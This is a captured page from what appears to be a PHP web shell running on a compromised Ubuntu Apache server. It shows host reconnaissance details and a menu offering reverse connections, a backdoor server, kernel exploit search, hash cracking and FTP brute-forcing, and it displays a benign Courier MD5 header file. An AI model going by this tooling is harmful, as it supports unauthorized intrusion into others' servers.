|
System | : | Linux MiraNet 3.0.0-14-generic-pae #23-Ubuntu SMP Mon Nov 21 22:07:10 UTC 2011 i686 |
Software | : | Apache. PHP/5.3.6-13ubuntu3.10 |
ID | : | uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
|
|
Safe Mode | : | OFF |
Open_Basedir | : | OFF |
Freespace | : | 22.05 GB of 70.42 GB (31.31%) |
|
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON |
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
|
[ System Info ]
[ Processes ]
[ SQL Manager ]
[ Eval ]
[ Encoder ]
[ Mailer ]
[ Back Connection ]
[ Backdoor Server ]
[ Kernel Exploit Search ]
[ MD5 Decrypter ]
[ Reverse IP ]
[ Kill Shell ]
[ FTP Brute-Force ]
|
|
/
usr/
src/
courier-0.66.1/
md5/
- drwxrwxrwx
|
Viewing file: md5.h (1.26 KB) -rw-rw-rw-Select action/file-type:  ( +) |  ( +) |  ( +) | Code ( +) | Session ( +) |  ( +) | SDB ( +) |  ( +) |  ( +) |  ( +) |  ( +) |  ( +) |
#ifndef md5_h #define md5_h
/* ** Copyright 1998 - 2001 Double Precision, Inc. ** See COPYING for distribution information. */
/* ** RFC 1321 MD5 Message digest calculation. ** ** Returns a pointer to a sixteen-byte message digest. */
#ifdef __cplusplus extern "C" { #endif
#if HAVE_CONFIG_H #include "md5/config.h" #endif
#if HAVE_SYS_TYPES_H #include <sys/types.h> #endif
#define MD5_DIGEST_SIZE 16 #define MD5_BLOCK_SIZE 64
typedef unsigned char MD5_DIGEST[MD5_DIGEST_SIZE];
#ifdef MD5_INTERNAL
struct MD5_CONTEXT {
MD5_WORD A, B, C, D;
unsigned char blk[MD5_BLOCK_SIZE]; unsigned blk_ptr; } ;
void md5_context_init(struct MD5_CONTEXT *); void md5_context_hash(struct MD5_CONTEXT *, const unsigned char[MD5_BLOCK_SIZE]); void md5_context_hashstream(struct MD5_CONTEXT *, const void *, unsigned); void md5_context_endstream(struct MD5_CONTEXT *, unsigned long); void md5_context_digest(struct MD5_CONTEXT *, MD5_DIGEST);
void md5_context_restore(struct MD5_CONTEXT *, const MD5_DIGEST);
#endif
void md5_digest(const void *msg, unsigned int len, MD5_DIGEST);
char *md5_crypt_redhat(const char *, const char *); #define md5_crypt md5_crypt_redhat
const char *md5_hash_courier(const char *); const char *md5_hash_raw(const char *);
#ifdef __cplusplus } ; #endif
#endif
|